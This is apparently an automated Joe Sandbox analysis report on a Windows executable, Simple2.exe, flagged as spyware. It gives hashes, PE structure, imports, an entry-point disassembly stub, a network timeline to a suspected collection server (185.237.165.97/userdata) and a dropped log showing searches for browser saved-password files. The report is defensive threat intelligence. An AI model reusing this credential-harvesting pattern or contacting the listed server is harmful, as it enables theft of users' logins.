          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          185.237.165.97
          unknownFrance
          52195AP-MEDIA-ASPLfalse
          172.67.74.152
          api.ipify.orgUnited States
          13335CLOUDFLARENETUSfalse
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1569894
          Start date and time:2024-12-06 11:09:34 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 13s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:14
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:Simple2.exe
          Detection:MAL
          Classification:mal68.spyw.winEXE@2/1@1/2
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 28
          • Number of non-executed functions: 21
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
          • Excluded IPs from analysis (whitelisted): 20.198.119.84
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, wns.notify.trafficmanager.net, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: Simple2.exe
          TimeTypeDescription
          05:10:29API Interceptor1x Sleep call for process: Simple2.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          185.237.165.97systemConfigChecker.exeGet hashmaliciousUnknownBrowse
          • 185.237.165.97/userdata
          systemConfigChecker.exeGet hashmaliciousUnknownBrowse
          • 185.237.165.97/userdata
          172.67.74.152systemConfigChecker.exeGet hashmaliciousUnknownBrowse
          • api.ipify.org/
          systemConfigChecker.exeGet hashmaliciousUnknownBrowse
          • api.ipify.org/
          2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
          • api.ipify.org/
          Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
          • api.ipify.org/
          67065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
          • api.ipify.org/
          Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
          • api.ipify.org/
          4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
          • api.ipify.org/
          y8tCHz7CwC.binGet hashmaliciousXmrigBrowse
          • api.ipify.org/
          file.exeGet hashmaliciousUnknownBrowse
          • api.ipify.org/
          file.exeGet hashmaliciousUnknownBrowse
          • api.ipify.org/
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          fp2e7a.wpc.phicdn.netFiyat Teklifi_2038900001-MOKAPTO-06122024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
          • 192.229.221.95
          16547.jsGet hashmaliciousMassLogger RATBrowse
          • 192.229.221.95
          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
          • 192.229.221.95
          file.exeGet hashmaliciousStealcBrowse
          • 192.229.221.95
          file.exeGet hashmaliciousLummaC StealerBrowse
          • 192.229.221.95
          XE5p2qNoWt.exeGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
          • 192.229.221.95
          https://ness.wiktripfitness.com/ghjki9l-8765t4/3/er4t5y6u7jyhtgrfefrgthyjuyhtgdsarfedwsqaGet hashmaliciousUnknownBrowse
          • 192.229.221.95
          izCOFC8OWh.exeGet hashmaliciousUnknownBrowse
          • 192.229.221.95
          TPDKSYfEac.exeGet hashmaliciousFormBook, GuLoaderBrowse
          • 192.229.221.95
          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
          • 192.229.221.95
          api.ipify.orgsystemConfigChecker.exeGet hashmaliciousUnknownBrowse
          • 172.67.74.152
          systemConfigChecker.exeGet hashmaliciousUnknownBrowse
          • 172.67.74.152
          kYGxoN4JVW.batGet hashmaliciousUnknownBrowse
          • 172.67.74.152
          REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeGet hashmaliciousAgentTeslaBrowse
          • 104.26.13.205
          PO54782322024.exeGet hashmaliciousAgentTeslaBrowse
          • 172.67.74.152
          https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2ddGet hashmaliciousEvilProxy, HTMLPhisherBrowse
          • 104.26.13.205
          https://url.us.m.mimecastprotect.com/s/tWC_CNkXmJcoqkvlsmfBIyQP6j?domain=assets-gbr.mkt.dynamics.comGet hashmaliciousEvilProxy, HTMLPhisherBrowse
          • 104.26.13.205
          lC7L7oBBMC.exeGet hashmaliciousAgentTeslaBrowse
          • 104.26.13.205
          0wxckB4Iba.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 172.67.74.152
          OHScaqAPjt.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
          • 172.67.74.152
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          AP-MEDIA-ASPLsystemConfigChecker.exeGet hashmaliciousUnknownBrowse
          • 185.237.165.97
          systemConfigChecker.exeGet hashmaliciousUnknownBrowse
          • 185.237.165.97
          x86.elfGet hashmaliciousMirai, MoobotBrowse
          • 46.149.221.180
          file.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
          • 185.237.165.180
          pjczQr2H3P.exeGet hashmaliciousSocks5SystemzBrowse
          • 185.237.165.53
          9TSh73ulR1.exeGet hashmaliciousSocks5SystemzBrowse
          • 185.237.165.53
          0o37tv6BhU.elfGet hashmaliciousMiraiBrowse
          • 46.149.221.189
          YZfB2vyTrR.elfGet hashmaliciousMiraiBrowse
          • 46.149.221.169
          pSWP8vqTi4.elfGet hashmaliciousMirai, MoobotBrowse
          • 46.149.221.178
          ISd7zpfQxZ.elfGet hashmaliciousMiraiBrowse
          • 46.149.221.177
          CLOUDFLARENETUSsystemConfigChecker.exeGet hashmaliciousUnknownBrowse
          • 172.67.74.152
          systemConfigChecker.exeGet hashmaliciousUnknownBrowse
          • 172.67.74.152
          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
          • 172.67.165.166
          5q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
          • 104.26.1.231
          2LKVPFub8Z.exeGet hashmaliciousSnake KeyloggerBrowse
          • 104.21.67.152
          file.exeGet hashmaliciousLummaC StealerBrowse
          • 104.21.16.9
          7fE6IkvYWf.exeGet hashmaliciousUnknownBrowse
          • 104.16.184.241
          kYGxoN4JVW.batGet hashmaliciousUnknownBrowse
          • 172.67.74.152
          datXObAAn1.exeGet hashmaliciousDiscord RatBrowse
          • 162.159.133.234
          EeXJoO1J62.exeGet hashmaliciousDiscord RatBrowse
          • 162.159.130.234
          No context
          No context
          Process:C:\Users\user\Desktop\Simple2.exe
          File Type:ISO-8859 text, with CRLF line terminators
          Category:dropped
          Size (bytes):1010
          Entropy (8bit):4.919298942950339
          Encrypted:false
          SSDEEP:24:8Za5Kk89fa5K889faM89OaYeb89faDWD89fcLfVpLfa+89fM1NVS:80UksyU8syMsLDbsyDWDsYtdy+siY
          MD5:8425BB69DE5A4EA76268807061D422D2
          SHA1:CDA63B9E4A33CBE7BB437BE935DF592FFDF79048
          SHA-256:AB07757EF265AA5F71C0CC6496EC4C812F892DAD4C6C7C81820B9315E9E221C7
          SHA-512:13654CF8B23FE0D24B50108A298FD0BC825B3D6580C9356CF27FF1CD79812FD611407DDA3BDAF90DB7370AE2C87DB0AEED1F0C1C005D6748C0136F97748E1C08
          Malicious:false
          Reputation:low
          Preview:File is found: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Local\Google\Chrome Beta\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data..File is found: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data..File not found: C:\Users\user\AppData\Roaming\Opera Software\Opera GX Stable\Login Data..File not found: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json..File is found: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\times.json.... ....... ........ ..... ..
          File type:PE32+ executable (console) x86-64, for MS Windows
          Entropy (8bit):5.944817639384687
          TrID:
          • Win64 Executable Console (202006/5) 92.65%
          • Win64 Executable (generic) (12005/4) 5.51%
          • Generic Win/DOS Executable (2004/3) 0.92%
          • DOS Executable Generic (2002/1) 0.92%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:Simple2.exe
          File size:79'872 bytes
          MD5:ed207427a25863f5524d616525943dd5
          SHA1:6b7aa5224f76b8e09d3a8eefdb299e16b37c887f
          SHA256:418b88c4cd03e7da38287324094b5af3843835d63e06fd44c0fb06903d7575b6
          SHA512:ee55d29e1a8aab196406767b84812fa428c064af8cb692b4e01a5b69ebf95462cd965e42a0d7c6ed95542e130da8fec9c25188aab84a353492f07977264ceac9
          SSDEEP:1536:SsN2HJVypWjCoZQcAkX8Uet4WTjs/U9w:rN2HDypWjCMekXBet4WPwMw
          TLSH:81734B47279904ECD2BBE37CD29A5A02D376BC05132697CF039191362FA67D0AE7EB11
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A..v/..v/..v/......v/...+..v/...,..v/...*..v/......v/......v/..v.."v/...&..v/......v/...-..v/.Rich.v/.........PE..d...h..f...
          Icon Hash:00928e8e8686b000
          Entrypoint:0x14000b768
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x140000000
          Subsystem:windows cui
          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Time Stamp:0x66F2E668 [Tue Sep 24 16:18:48 2024 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:6
          OS Version Minor:0
          File Version Major:6
          File Version Minor:0
          Subsystem Version Major:6
          Subsystem Version Minor:0
          Import Hash:066fb96ba163200488bf8cbd9705163e
          Instruction
          dec eax
          sub esp, 28h
          call 00007FF028F490A0h
          dec eax
          add esp, 28h
          jmp 00007FF028F48967h
          int3
          int3
          retn 0000h
          int3
          inc eax
          push ebx
          dec eax
          sub esp, 20h
          dec eax
          mov ebx, ecx
          xor ecx, ecx
          call dword ptr [0000194Fh]
          dec eax
          mov ecx, ebx
          call dword ptr [0000193Eh]
          call dword ptr [00001948h]
          dec eax
          mov ecx, eax
          mov edx, C0000409h
          dec eax
          add esp, 20h
          pop ebx
          dec eax
          jmp dword ptr [0000193Ch]
          dec eax
          mov dword ptr [esp+08h], ecx
          dec eax
          sub esp, 38h
          mov ecx, 00000017h
          call dword ptr [00001930h]
          test eax, eax
          je 00007FF028F48AF9h
          mov ecx, 00000002h
          int 29h
          dec eax
          lea ecx, dword ptr [000090A6h]
          call 00007FF028F48B9Eh
          dec eax
          mov eax, dword ptr [esp+38h]
          dec eax
          mov dword ptr [0000918Dh], eax
          dec eax
          lea eax, dword ptr [esp+38h]
          dec eax
          add eax, 08h
          dec eax
          mov dword ptr [0000911Dh], eax
          dec eax
          mov eax, dword ptr [00009176h]
          dec eax
          mov dword ptr [00008FE7h], eax
          dec eax
          mov eax, dword ptr [esp+40h]
          dec eax
          mov dword ptr [000090EBh], eax
          mov dword ptr [00008FC1h], C0000409h
          mov dword ptr [00008FBBh], 00000001h
          mov dword ptr [00008FC5h], 00000001h
          Programming Language:
          • [IMP] VS2008 SP1 build 30729
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x10dbc0x154.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x1e0.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x150000x948.pdata
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x170000x10c.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0xe7c00x70.rdata
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xe6800x140.rdata
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0xd0000x630.rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000xba070xbc009b0eebbbfa76824e01521c9aec7dfe57False0.4793675199468085zlib compressed data6.10415307318274IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rdata0xd0000x61280x6200f96793aa05943a27e75f5c0f81ce41a1False0.3508450255102041data4.9758094084428075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0x140000xda00x800a1584494173fef381407b0a55fe58cdfFalse0.197265625DOS executable (block device driver)3.6123807981210243IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .pdata0x150000x9480xa0056d1a1fb2414222ac35eeeae290fd52eFalse0.46796875data4.4815576012306435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .rsrc0x160000x1e00x200c970c10a1e848ee974b87923ecbe6a2fFalse0.525390625data4.706155132693063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0x170000x10c0x200229d40605aa4496585f934aa5d939a3aFalse0.421875data3.2433320779278194IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountryZLIB Complexity
          RT_MANIFEST0x160600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
          DLLImport
          KERNEL32.dllGetFileAttributesW, GetLocaleInfoA, OpenProcess, GetTimeZoneInformation, GetLastError, CloseHandle, K32GetModuleBaseNameA, GetSystemInfo, K32EnumProcesses, GlobalMemoryStatusEx, GetConsoleWindow, K32EnumProcessModules, GetDiskFreeSpaceExA, FindClose, InitializeSListHead, GetSystemTimeAsFileTime, GetEnvironmentVariableW, FindNextFileW, FindFirstFileW, GetLogicalDrives, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, RtlLookupFunctionEntry, GetModuleFileNameA, GetCurrentThreadId, RtlCaptureContext
          USER32.dllShowWindow
          ADVAPI32.dllRegGetValueA, RegCloseKey, RegOpenKeyExA
          MSVCP140.dll?id@?$codecvt@_WDU_Mbstatet@@@std@@2V0locale@2@A, ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ, ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ?sputn@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAA_JPEB_W_J@Z, ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z, ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD@Z, ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z, ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W@Z, ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z, ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD@Z, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXPEAPEAD0PEAH001@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z, ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?_Lock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ, ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JXZ, ?uflow@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAHXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J@Z, ?setbuf@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAPEAV12@PEAD_J@Z, ?sync@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAHXZ, ?imbue@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAXAEBVlocale@2@@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z, ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z, ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z, ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ, ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?good@ios_base@std@@QEBA_NXZ, ??7ios_base@std@@QEBA_NXZ, ??1?$codecvt@_WDU_Mbstatet@@@std@@MEAA@XZ, ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K@Z, ?out@?$codecvt@_WDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEB_W1AEAPEB_WPEAD3AEAPEAD@Z, ?in@?$codecvt@_WDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEA_W3AEAPEA_W@Z, ?always_noconv@codecvt_base@std@@QEBA_NXZ, ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K@Z, ?_Decref@facet@locale@std@@UEAAPEAV_Facet_base@3@XZ, ?_Incref@facet@locale@std@@UEAAXXZ, ??Bid@locale@std@@QEAA_KXZ, ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z, ?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A, ?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A, ?uncaught_exception@std@@YA_NXZ, ?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z, ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ, ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@@Z, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ??0_Lockit@std@@QEAA@H@Z, ??1_Lockit@std@@QEAA@XZ, ?_Xlength_error@std@@YAXPEBD@Z
          IPHLPAPI.DLLGetAdaptersInfo
          NETAPI32.dllNetApiBufferFree, NetUserEnum, NetGetJoinInformation
          WINHTTP.dllWinHttpQueryDataAvailable, WinHttpConnect, WinHttpSendRequest, WinHttpCloseHandle, WinHttpOpenRequest, WinHttpReadData, WinHttpQueryHeaders, WinHttpOpen, WinHttpReceiveResponse
          VCRUNTIME140_1.dll__CxxFrameHandler4
          VCRUNTIME140.dll__C_specific_handler, _CxxThrowException, memset, __current_exception, __std_terminate, __std_exception_copy, memcpy, memcmp, memchr, memmove, __current_exception_context, __std_exception_destroy
          api-ms-win-crt-stdio-l1-1-0.dllfread, fsetpos, ungetc, _fseeki64, _get_stream_buffer_pointers, setvbuf, fgetpos, fwrite, fflush, __p__commode, fputc, fgetc, fclose, _set_fmode
          api-ms-win-crt-heap-l1-1-0.dllfree, malloc, _set_new_mode, _callnewh
          api-ms-win-crt-string-l1-1-0.dllisalnum
          api-ms-win-crt-filesystem-l1-1-0.dll_lock_file, _unlock_file
          api-ms-win-crt-runtime-l1-1-0.dll_get_initial_narrow_environment, _initterm, _initterm_e, _cexit, _exit, __p___argc, __p___argv, _c_exit, _register_thread_local_exe_atexit_callback, _crt_atexit, _register_onexit_function, _seh_filter_exe, _initialize_onexit_table, _initialize_narrow_environment, _configure_narrow_argv, _set_app_type, exit, terminate, _invalid_parameter_noinfo_noreturn
          api-ms-win-crt-math-l1-1-0.dll__setusermatherr
          api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States
          TimestampSource PortDest PortSource IPDest IP
          Dec 6, 2024 11:10:29.747333050 CET4971480192.168.2.6172.67.74.152
          Dec 6, 2024 11:10:29.867048025 CET8049714172.67.74.152192.168.2.6
          Dec 6, 2024 11:10:29.867139101 CET4971480192.168.2.6172.67.74.152
          Dec 6, 2024 11:10:29.898848057 CET4971480192.168.2.6172.67.74.152
          Dec 6, 2024 11:10:30.027228117 CET8049714172.67.74.152192.168.2.6
          Dec 6, 2024 11:10:30.962733984 CET8049714172.67.74.152192.168.2.6
          Dec 6, 2024 11:10:31.013643980 CET4971480192.168.2.6172.67.74.152
          Dec 6, 2024 11:10:31.943598986 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:32.063754082 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.063831091 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:32.064127922 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:32.064218044 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:32.183779955 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.183846951 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:32.183880091 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.183939934 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:32.184063911 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.184075117 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.184083939 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.184120893 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:32.184138060 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.184145927 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:32.184187889 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:32.184205055 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.184218884 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.184247017 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.184267998 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:32.184292078 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:32.184302092 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.184351921 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:32.303637981 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.303705931 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:32.303811073 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.303865910 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.303921938 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:32.304217100 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.304229021 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.304276943 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:32.304311037 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.304353952 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:32.344950914 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.345122099 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:32.464891911 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.465029001 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:32.512991905 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.513044119 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:32.629190922 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.629280090 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:32.717037916 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.717109919 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:32.876857996 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:32.876909971 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:33.117204905 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:33.117300987 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:33.360977888 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:33.361079931 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:33.604847908 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:33.604968071 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:33.844959974 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:33.845041037 CET4971580192.168.2.6185.237.165.97
          Dec 6, 2024 11:10:34.088849068 CET8049715185.237.165.97192.168.2.6
          Dec 6, 2024 11:10:34.190660954 CET8049715185.237.165.97192.168.2.6
